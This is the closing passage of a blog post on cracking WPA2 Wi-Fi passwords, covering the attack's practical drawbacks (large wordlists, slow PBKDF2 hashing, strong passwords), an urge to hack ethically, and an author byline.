The main issue is password cracking, which is lengthy, painstaking and kills us from the inside: we need a password file, probably 2-3 GB in size with about 30 million (3 crore) passwords in total, and because WPA2 runs 4096 rounds of PBKDF2 for every candidate, going through it takes 2-3 days on a CPU and may not work at all, so yes, it's frustrating.

The second issue is that the procedure is long, and if we miss even one step the entire attack won't work and we have to start again from the beginning.

Or, worst of all, the person has a long and strong password, which makes it all but impossible to crack.

Conclusion.

I conclude this article by telling you that you need to learn hacking, but ethically, and make sure you don't hack some government person and go behind bars, so beware.

Suggestions.

I am writing articles on various hacking topics, but I don't know which ones are most in demand in the security field at present, so if there are any topics you want articles on, feel free to contact me via the links below.

I am also planning to write walkthroughs of TryHackMe rooms, so if you have any suggestions, contact me.

Sources.

Zsecurity

And that's it.

Contact me.


Written by morpheuslord | I am a red team operator, and a security enthusiast I write blogs and articles related to cyber-sec topics.
Published by HackerNoon on 2021/10/25